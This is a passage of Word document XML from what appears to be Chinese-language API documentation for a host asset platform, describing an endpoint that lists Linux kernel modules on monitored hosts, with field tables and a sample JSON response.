          <w:p w14:paraId="3B56F081" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>moduleName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11554D8C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="108CAEAE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0016133F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>模块名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="225EA8D5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42C06427" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69CF05B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="461ACCEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D3416E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>模块路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="198DA47F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="247FA6DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5030F13B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00A33DD4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="118795E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>模块版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69EC4D40" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295C7FC8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/kernelmodule/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9EF0A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58820337" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "fe107d9c77f4c77a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "connectionIp": "172.16.2.244",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "12345",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "xdu-vm-cent51",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "moduleName": "ablk_helper",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "description": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "path": "/lib/modules/4.4.0-21-generic/kernel/crypto/ablk_helper.ko",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "version": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "size": 16384,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "depends": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "cryptd"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "holders": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "aesni_intel"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC22DB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>返回rows部分说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1516"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1791"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="084199D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A5FE1E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B6A2565" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="122982AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D86679B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5B679DE0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57B6F86F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2165B0CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="553BEF87" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7760E615" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agent uuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="246AF859" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31208A18" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="485E8DE4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E762F21" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46FAF3E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3D49F66D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36C6409B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EA93EB7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DD7EC76" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F975FFC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="515C490D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="597F900F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DC66ED6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1096C3FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02E975E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="10C20755" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C6B4B6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B393498" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CA37432" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25AD9F39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="35CF69E3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E9FEF23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58A618CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7712AA38" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22190B33" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="08D2833F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="711DF271" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24EAD61C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6024A9CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79929E5E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="06180F17" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F01CE8C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="535D8F59" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="475135E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="118DC054" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2CC182CB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64079E26" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="134B0BDF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41132B59" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1772DE29" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="186F2270" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16C36C8E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62285003" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F92676B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E965606" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="63D58767" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A88D8B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>moduleName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EEE9688" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5211C622" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EEAE165" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>模块名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2DABBFA7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11B85E9A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6911E7CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EF6839A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0223ACE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>模块描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="23499693" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30E43EF1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F4F62CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="638DC4E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50C7FD34" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>模块路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3BC65616" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59224158" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
